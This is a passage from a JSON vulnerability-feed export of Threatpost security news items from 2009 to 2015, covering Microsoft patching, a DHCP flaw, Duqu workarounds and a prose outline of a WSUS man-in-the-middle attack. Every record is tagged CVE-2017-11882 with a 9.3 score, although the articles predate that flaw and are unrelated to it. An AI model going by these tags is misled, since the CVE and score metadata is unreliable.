"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Dennis Fisher and Mike Mimoso talk about the end of the Patch Tuesday era for most Microsoft customers, the appeals court ruling on Section 215 metadata collection and Dennis\u2019s idea for a security industry commission.\n\nDownload: [digital_underground_201.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_201.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-08T12:12:40", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on the End of the Patch Tuesday Era, Section 215 and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T16:39:21", "id": "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "href": "https://threatpost.com/threatpost-news-wrap-may-8-2015/112705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Profile, automates the assignment of IP hosts with IP addresses and configuration information. Its used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workaround available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "In this video, researchers Juliano Rizzo and Thai Duong demonstrate the technique they developed for stealing cryptographic keys for ASP.NET Web applications, enabling them to compromise virtually any app built on ASP.NET. \n\nYou can read the full story of their attack in this article, \u201c[Padding Oracle Attack Affects Millions of ASP.NET Apps](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>).\u201d\n", "cvss3": {}, "published": "2010-09-17T17:48:52", "type": "threatpost", "title": "Demo of ASP.NET Padding Oracle Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "href": "https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/74485/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. \n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "[](<https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/>)The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems. \nFrom the article: \n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar. \n\nHowever, the latest patches appear to make some changes to those \nregistry keys. The effect is that some installed applications aren\u2019t \naware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%syswow64t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time.,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure enterprises may be engrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s sChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidently or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users that last week was made public along with proof-of-concept code, still is unpatched and Microsoft has been silent on when a fix is coming. That silence, could in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps, security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in a timely fashion to Windows Update. Patches are also tested against third party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday, say for automatic silent patching, a la Google\u2019s updates to Chrome, for example, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a head\u2019s up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers, however, have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft have so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer have made buffer overflow vulnerabilities less of a hassle than a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad them into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. \n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "[](<https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/>)A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring a administrator level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. \n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system. \n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d \n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past by to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack. \n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059 for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. The company also [issued a security advisory,](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API. \n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the security fix suggested are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems. \n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, Group Manager, Trustworthy Computing, Microsoft said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that the Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. \n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:52", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060714/katie_moussouris2.jpg>)Dennis Fisher talks with Katie Moussouris of Microsoft about her childhood exploits with Commodore 64 programming, ignoring her Barbies, growing up as a hacker, her days as a pen tester and the challenges of working on security at Microsoft.\n\nDownload: [12_moussouris.mp3](<http://traffic.libsyn.com/digitalunderground/10_moussouris.mp3>)\n\n_*Microsoft image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream, Creative Commons_\n", "cvss3": {}, "published": "2013-11-04T09:00:25", "type": "threatpost", "title": "How I Got Here: Katie Moussouris", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-04T19:16:25", "id": "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "href": "https://threatpost.com/how-i-got-here-katie-moussouris/102784/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:27", "description": "LAS VEGAS \u2013 Windows Server Update Services (WSUS) is your friend, if you run an enterprise IT shop, because it facilitates the download and distribution of security patches, service pack installations and hardware driver updates among others.\n\nTwo researchers this week at the Black Hat conference, however, point out that WSUS can be a significant weakness that can lead to the complete compromise of any server or desktop in an organization hooked up to the automated update service.\n\nPaul Stone and Alex Chapman of Context Information Security in the U.K. took a long look at the WSUS attack surface and discovered that when a WSUS server contacts Microsoft for driver updates, it does so using XML SOAP web services, and those checks are not made over SSL. While updates are signed by Microsoft and updates must be verified by Microsoft, Stone and Chapman discovered that an attacker already in a man-in-the-middle position on a corporate network, for example, could with some work tamper with the unencrypted communication and inject a malicious homegrown update.\n\nWhile turning on SSL during the initial WSUS configuration mitigates the situation, there are organizations that may skip this crucial\u2014and last step\u2014of the WSUS setup. An attacker who manages to get a malicious update into an organization via WSUS, could do anything from remove, downgrade or stop patches from being installed to getting full control over servers and desktops.\n\n\u201cIt\u2019s the worst-case scenario and it\u2019s fairly bad,\u201d Stone said. \u201cAnd it\u2019s not a vulnerability, it\u2019s not something for Microsoft to fix.\u201d\n\nStone and Chapman said they\u2019ve had a dialogue with Microsoft about their research, which Microsoft acknowledged and said that it recommends enterprise admins turn on SSL. Doing so requires provisioning a SSL cert for machines doing the update, a process that cannot be automated.\n\n\u201cIt\u2019s not difficult and it\u2019s something that most admins would know how to do,\u201d Stone said. \u201cMicrosoft cannot do it by default. They could prevent it from working until a cert is put in, I suppose.\u201d\n\nStone and Chapman said they decided to tackle drivers because most are written by third parties for Windows servers and clients, and made for an easier target because, despite the fact that updates are signed and verified by Microsoft, XML metadata can be updated so that it points to, downloads and executes a malicious update.\n\nFrom Stone and Chapman\u2019s [paper](<http://www.contextis.com/media/documents/CTX_WSUSpect_White_Paper.pdf>):\n\n> Windows Update will verify that each update is signed by Microsoft. However, there is no specific \u2018Windows Update\u2019 signing certificate\u2013any file that is signed by a Microsoft CA will be accepted. By injecting an update that uses the CommandLineInstallation update handler, an attacker can cause a client to run any Microsoft-signed executable, even one that was not intended to be used in Windows Update. Even better, the executable can be run with arbitrary arguments. Therefore we need to find a suitable executable that will allow arbitrary commands to be executed.\n\nThey turned to the [Windows Sysinternals tool, specifically the remote command utility called PsExec](<https://technet.microsoft.com/en-us/sysinternals/bb896649.aspx>) which is signed by Microsoft.\n\n\u201cEssentially, we made a program which man-in-the-middles the WSUS traffic, and then created a fake update and the told machine to download PsExec and run it with whatever arguments to do something malicious,\u201d Chapman said. \u201cThat\u2019s the attack. The really fun thing is that all updates are installed as system whether you\u2019re a low privileged user or an admin. So this is quite powerful.\u201d\n\nThe only prerequisite for the attack is to already be on the network. From there, even an unauthenticated attacker can run the attack for any machine running WSUS without SSL to run arbitrary commands, Chapman said.\n\n\u201cThe hard thing was just finding the signed Microsoft executables we could put down and run to do useful things,\u201d Chapman said.\n", "cvss3": {}, "published": "2015-08-07T09:00:28", "type": "threatpost", "title": "Manipulating Microsoft WSUS to Own Enterprises", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-08-07T00:20:31", "id": "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "href": "https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "** \n**\n\nDatabase Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)\n\nQuite often in our industry, two (or five) people can look at the same problem from different angles, and see radically different things. Rare is the situation that reads the same to everyone, forwards and backwards. It\u2019s all about perspective.\n\nIn my appearance on the \u2018[Partial Disclosure Dilemma\u2019 Panel](<http://blogs.msdn.com/katie_moussouris/archive/2009/03/09/the-partial-disclosure-dilemma-panel-at-sourceboston.aspx>) at [SOURCEBoston](<http://www.sourceconference.com/index.php/source-boston-2009>) this year, I found myself surrounded by great minds who most certainly do not think alike. While there was some agreement and common ground between all parties on the dais, namely wanting to make the Internet safer and protecting people, there was little agreement on the best way to accomplish that goal.\n\nThe conversation between us friends and colleagues, both on stage and in the audience, wended its way down many tangential paths, most of which I will 